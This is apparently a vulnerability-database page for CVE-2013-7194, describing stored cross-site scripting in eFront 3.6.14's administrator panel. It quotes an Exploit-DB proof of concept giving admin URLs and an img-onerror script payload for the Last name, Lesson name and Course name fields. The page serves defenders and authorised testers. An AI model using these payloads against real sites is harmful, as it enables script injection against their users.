VIR Vulnerability Intelligence Relay

CVE-2013-7194

low
Published 2013-12-21 · Modified 2026-04-29
💬 Discuss on Community ✚ Propose mitigation
CVSS v3
CVSS v4 NEW
not yet in upstream
VIR risk
4.5

Description

Multiple cross-site scripting (XSS) vulnerabilities in www/administrator.php in eFront 3.6.14 (build 18012) allow remote authenticated administrators to inject arbitrary web script or HTML via the (1) Last name, (2) Lesson name, or (3) Course name field.

Predictions

Exploit likelihood
20%
Patch ETA

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-30213 webapps php verified text · 1 KB
sajith · 2013-12-11

eFront 3.6.14 (build 18012) - Multiple Persistent Cross-Site Scripting Vulnerabilities

text exploit Source: Exploit-DB 
###########################################################

Exploit-DB Note: Screenshot provided by exploit author.

###########################################################
[~] Exploit Title: eFront v3.6.14 (build 18012) -Stored XSS in multiple
Parameters
[~] Author: sajith
[~] version: eFront v3.6.14- build 18012
[~]Vendor Homepage: http://www.efrontlearning.net/
[~] vulnerable app link:http://www.efrontlearning.net/download
###########################################################



POC by sajith shetty:

[###]Log in with admin account and create new user

http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php?ctg=personal&user=root&op=profile&add_user=1

(Home � Users � Administrator S. (root) � New user)

Here "Last name" field is vulnerable to stored XSS [payload:"><img src=x
onerror=prompt(1);>  ]



[###]create new lesson option (
http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php
?

ctg=lessons&add_lesson=1) where "Lession name" is vulnerable to stored xss

[payload:"><img src=x onerror=prompt(1);>  ]



[###]create new courses option(
http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php
?

ctg=courses&add_course=1) where "Course name:" filed is vulnerable to
stored XSS

Application impact
VendorProductVersionsFixed
efrontlearningefront3.6.14

References

CWEs

CWE-79

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.